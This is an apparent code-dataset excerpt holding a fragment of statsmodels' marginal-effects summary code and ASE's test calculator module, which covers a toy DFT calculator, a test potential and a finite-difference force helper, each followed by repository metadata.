-------
Summary : SummaryTable
A SummaryTable instance
"""
_check_at_is_all(self.margeff_options)
results = self.results
model = results.model
title = model.__class__.__name__ + " Marginal Effects"
method = self.margeff_options['method']
top_left = [('Dep. Variable:', [model.endog_names]),
('Method:', [method]),
('At:', [self.margeff_options['at']]), ]
from statsmodels.iolib.summary import (Summary, summary_params,
table_extend)
exog_names = model.exog_names[:] # copy
smry = Summary()
const_idx = model.data.const_idx
if const_idx is not None:
exog_names.pop(const_idx)
J = int(getattr(model, "J", 1))
if J > 1:
yname, yname_list = results._get_endog_name(model.endog_names,
None, all=True)
else:
yname = model.endog_names
yname_list = [yname]
smry.add_table_2cols(self, gleft=top_left, gright=[],
yname=yname, xname=exog_names, title=title)
# NOTE: add_table_params is not general enough yet for margeff
# could use a refactor with getattr instead of hard-coded params
# tvalues etc.
table = []
conf_int = self.conf_int(alpha)
margeff = self.margeff
margeff_se = self.margeff_se
tvalues = self.tvalues
pvalues = self.pvalues
if J > 1:
for eq in range(J):
restup = (results, margeff[:, eq], margeff_se[:, eq],
tvalues[:, eq], pvalues[:, eq], conf_int[:, :, eq])
tble = summary_params(restup, yname=yname_list[eq],
xname=exog_names, alpha=alpha,
use_t=False,
skip_header=True)
tble.title = yname_list[eq]
# overwrite coef with method name
header = ['', _transform_names[method], 'std err', 'z',
'P>|z|',
'[%3.1f%% Conf. Int.]' % (100 - alpha * 100)]
tble.insert_header_row(0, header)
# from IPython.core.debugger import Pdb; Pdb().set_trace()
table.append(tble)
table = table_extend(table, keep_headers=True)
else:
restup = (results, margeff, margeff_se, tvalues, pvalues, conf_int)
table = summary_params(restup, yname=yname, xname=exog_names,
alpha=alpha, use_t=False, skip_header=True)
header = ['', _transform_names[method], 'std err', 'z',
'P>|z|', '[%3.1f%% Conf. Int.]' % (100 - alpha * 100)]
table.insert_header_row(0, header)
smry.tables.append(table)
return smry
def get_margeff(self, at='overall', method='dydx', atexog=None,
dummy=False, count=False):
self._reset() # always reset the cache when this is called
# TODO: if at is not all or overall, we can also put atexog values
# in summary table head
method = method.lower()
at = at.lower()
_check_margeff_args(at, method)
self.margeff_options = dict(method=method, at=at)
results = self.results
model = results.model
params = results.params
exog = model.exog.copy() # copy because values are changed
effects_idx = exog.var(0) != 0
const_idx = model.data.const_idx
if dummy:
_check_discrete_args(at, method)
dummy_idx, dummy = _get_dummy_index(exog, const_idx)
else:
dummy_idx = None
if count:
_check_discrete_args(at, method)
count_idx, count = _get_count_index(exog, const_idx)
else:
count_idx = None
# get the exogenous variables
exog = _get_margeff_exog(exog, at, atexog, effects_idx)
# get base marginal effects, handled by sub-classes
effects = model._derivative_exog(params, exog, method,
dummy_idx, count_idx)
effects = _effects_at(effects, at)
if at == 'all':
self.margeff = effects[:, effects_idx]
else:
# Set standard error of the marginal effects by Delta method.
margeff_cov, margeff_se = margeff_cov_with_se(
model, params, exog, results.cov_params(), at,
model._derivative_exog, dummy_idx, count_idx,
method, 1)
# do not care about at constant
self.margeff_cov = margeff_cov[effects_idx][:, effects_idx]
self.margeff_se = margeff_se[effects_idx]
self.margeff = effects[effects_idx]
|
jseabold/statsmodels
|
statsmodels/genmod/generalized_estimating_equations.py
|
Python
|
bsd-3-clause
| 115,703
|
[
"Gaussian"
] |
75321e719c37fbb8e2687169d3e332ea6b3e6cd230e27af8a88d3b39fdbae2c5
|
from math import pi
import pickle
import numpy as np
from ase.atoms import Atoms
from ase.parallel import world, rank, distribute_cpus
from ase.utils import opencew
def make_test_dft_calculation():
a = b = 2.0
c = 6.0
atoms = Atoms(positions=[(0, 0, c / 2)],
symbols='H',
pbc=(1, 1, 0),
cell=(a, b, c),
calculator=TestCalculator())
return atoms
class TestCalculator:
def __init__(self, nk=8):
assert nk % 2 == 0
bzk = []
weights = []
ibzk = []
w = 1.0 / nk**2
for i in range(-nk + 1, nk, 2):
for j in range(-nk + 1, nk, 2):
k = (0.5 * i / nk, 0.5 * j / nk, 0)
bzk.append(k)
if i >= j > 0:
ibzk.append(k)
if i == j:
weights.append(4 * w)
else:
weights.append(8 * w)
assert abs(sum(weights) - 1.0) < 1e-12
self.bzk = np.array(bzk)
self.ibzk = np.array(ibzk)
self.weights = np.array(weights)
# Calculate eigenvalues and wave functions:
self.init()
def init(self):
nibzk = len(self.weights)
nbands = 1
V = -1.0
self.eps = 2 * V * (np.cos(2 * pi * self.ibzk[:, 0]) +
np.cos(2 * pi * self.ibzk[:, 1]))
self.eps.shape = (nibzk, nbands)
self.psi = np.zeros((nibzk, 20, 20, 60), complex)
phi = np.empty((2, 2, 20, 20, 60))
z = np.linspace(-1.5, 1.5, 60, endpoint=False)
for i in range(2):
x = np.linspace(0, 1, 20, endpoint=False) - i
for j in range(2):
y = np.linspace(0, 1, 20, endpoint=False) - j
r = (((x[:, None]**2 +
y**2)[:, :, None] +
z**2)**0.5).clip(0, 1)
phi = 1.0 - r**2 * (3.0 - 2.0 * r)
phase = np.exp(pi * 2j * np.dot(self.ibzk, (i, j, 0)))
self.psi += phase[:, None, None, None] * phi
def get_pseudo_wave_function(self, band=0, kpt=0, spin=0):
assert spin == 0 and band == 0
return self.psi[kpt]
def get_eigenvalues(self, kpt=0, spin=0):
assert spin == 0
return self.eps[kpt]
def get_number_of_bands(self):
return 1
def get_k_point_weights(self):
return self.weights
def get_number_of_spins(self):
return 1
def get_fermi_level(self):
return 0.0
class TestPotential:
def get_forces(self, atoms):
E = 0.0
R = atoms.positions
F = np.zeros_like(R)
for a, r in enumerate(R):
D = R - r
d = (D**2).sum(1)**0.5
x = d - 1.0
E += np.vdot(x, x)
d[a] = 1
F -= (x / d)[:, None] * D
self.energy = 0.25 * E
return F
def get_potential_energy(self, atoms):
self.get_forces(atoms)
return self.energy
def get_stress(self, atoms):
raise NotImplementedError
def numeric_force(atoms, a, i, d=0.001):
"""Evaluate force along i'th axis on a'th atom using finite difference.
This will trigger two calls to get_potential_energy(), with atom a moved
plus/minus d in the i'th axial direction, respectively.
"""
p0 = atoms.positions[a, i]
atoms.positions[a, i] += d
eplus = atoms.get_potential_energy()
atoms.positions[a, i] -= 2 * d
eminus = atoms.get_potential_energy()
atoms.positions[a, i] = p0
return (eminus - eplus) / (2 * d)
|
askhl/ase
|
ase/calculators/test.py
|
Python
|
gpl-2.0
| 3,631
|
[
"ASE"
] |
b05f0b50bd9eb1fb33a44df5a496db2e96a72a9f9ae15143dfbac120edd6871a
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.